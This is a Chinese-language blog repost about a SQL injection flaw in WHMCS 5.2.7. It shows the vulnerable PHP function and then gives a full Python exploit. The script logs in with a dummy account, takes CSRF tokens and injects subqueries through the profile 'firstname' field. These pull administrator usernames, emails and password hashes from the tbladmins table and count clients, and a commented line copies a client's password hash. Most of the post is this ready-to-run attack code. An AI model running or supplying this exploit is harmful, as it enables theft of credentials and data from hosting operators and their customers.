联系邮箱:September@zbuse.com 投稿 / 读者墙 / 友情链接 / 文章存档 / 标签云

Whmcs 5.2.7爆SQL注入漏洞

管理系统 September 5777℃ 0评论

localhost.re大牛在爆solusvm漏洞后沉寂了几个月又爆出了whmcs的SQL注入漏洞。
每篇文章还是依旧带一张搞笑得gif图片

漏洞文件 /includes/dbfunctions.php:

<?php
function update_query($table, $array, $where) {
    #[...]
    if (substr($value, 0, 11) == 'AES_ENCRYPT') {
        $query .= $value.',';
        continue;
    }
    #[...]
    $result = mysql_query($query, $whmcsmysql);
 }
?>

另外还附带了Python的EXP

#!/usr/bin/env python
# 2013/10/03 – WHMCS 5.2.7 SQL Injection
# http://localhost.re/p/whmcs-527-vulnerability

url = ‘http://clients.target.com/’ # wopsie dopsie
user_email = ‘mysuper@hacker.account’ # just create a dummie account at /register.php
user_pwd = ‘hacker’

import urllib, re, sys
from urllib2 import Request, urlopen
ua = “Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36”

def exploit(sql):
print “Doing stuff: %s” % sql
r = urlopen(Request(‘%sclientarea.php?action=details’ % url, data=”token=%s&firstname=%s&lastname=1&companyname=1&email=%s&paymentmethod=none&billingcid=0&address1=1&address2=1&city=1&state=1&postcode=1&country=US&phonenumber=1&save=Save+Changes” % (user[1], ‘AES_ENCRYPT(1,1), firstname=%s’ % sql, user_email), headers={“User-agent”: ua, “Cookie”: user[0]})).read()
return re.search(r'(id=”firstname” value=”(.*?)”)’, r).group(2)

def login():
print “Getting CSRF token”
r = urlopen(Request(‘%slogin.php’ % url, headers={“User-agent”: ua}))
csrf = re.search(r'(type=”hidden” name=”token” value=”([0-9a-f]{40})”)’, r.read()).group(2)
cookie = r.info()[‘set-cookie’].split(‘;’)[0]
print “Logging in”
r = urlopen(Request(‘%sdologin.php’ % url, data=”username=%s&password=%s&token=%s” %(user_email, user_pwd, csrf), headers={“User-agent”: ua, “Cookie”: cookie})).read()
if ‘dologin.php’ in r:
sys.exit(‘Unable to login’)
else:
return [cookie, re.search(r'(type=”hidden” name=”token” value=”([0-9a-f]{40})”)’, r).group(2)]

user = login()
print exploit(‘(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)’) # get admins
print exploit(‘(SELECT * FROM (SELECT COUNT(id) FROM tblclients) as x)’) # just get a count of clients

# oh you want to be evil
#exploit(“‘DISASTER’, password=(SELECT * FROM (SELECT password FROM tblclients WHERE email=’%s’ LIMIT 1) as x)#” % user_email)

原文地址:http://localhost.re/p/whmcs-527-vulnerability

转载请注明:装逼爱好者 » Whmcs 5.2.7爆SQL注入漏洞

喜欢 (3)
发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址